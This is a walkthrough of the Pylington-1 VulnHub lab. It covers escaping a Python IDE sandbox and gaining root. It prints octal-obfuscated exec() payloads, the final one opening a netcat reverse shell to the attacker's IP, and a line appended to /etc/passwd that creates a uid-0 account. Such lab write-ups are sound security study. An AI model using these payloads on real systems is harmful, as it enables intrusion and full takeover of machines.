Hi, hope you are well and healthy. This is the write-up for the Pylington-1 vulnhub machine.
If you want to solve this machine you can download it from here.
Let’s begin with finding all open ports on the machine using nmap.
Now lets find the services and their version on port 22 and 80.
As we can see, there are 3 disallowed entries in robots.txt When we visit the port 80, below page in opened in browser.
Robots.txt entries:
When I tried to visit, /register page, I got the message that currently we are unable to register.
Then I visit “/zbir7mn240soxhicso2z”, I got the username and password.
When I logged in, I got redirected to below page.
As it says, it is a Super Secret Python IDE and it also mentioned it uses sandbox. Just to test the IDE, I used print command which worked with no issues. Then I used “__import__ (‘us). system (‘ls -la’)”, I got below message.
Then I searched for “NoImportOS Sandbox code executoin BYPASS”, got below result
I used below payload:
Payload in hexadecimal:
exec(“\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51”)
Input:
Output:
We have code execution, then I used nc to get reverse shell.
Final Payload:
exec(“\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\57\165\163\162\57\142\151\156\57\156\143\40\55\145\40\57\142\151\156\57\142\141\163\150\40\61\71\62\56\61\66\70\56\71\56\63\40\64\64\63\47\51\12”)
Started the netcat listener on port 443 on attacking machine and execute the above payload, got reverse shell.
As we see, there is a file named “typing” with suid bit set.
Road to user py:
I execute the “typing” file and got the password for use py.
Using above username and password I SSH into the box.
In the py directory, there is a directory called secret_stuff which has couple of files. The backup has a suid set and it is running with root permission
Source code for backup.
The backup append the line to the file in the directory /srv/backups/. If we want to become root, we can add user with root permission in the /etc/passwd file, but the source says it should be in /srv/backups/.
Lets first create a password for the username using openssl.
We need to append below line to /etc/passwd file:
rootit:A01LlfJ378prI:0:0:/root/root:/bin/bash
Able to append the line into /etc/passwd
Lets try to login with it.We are now root on the box.
Hope you like the write-up…stay home stay safe.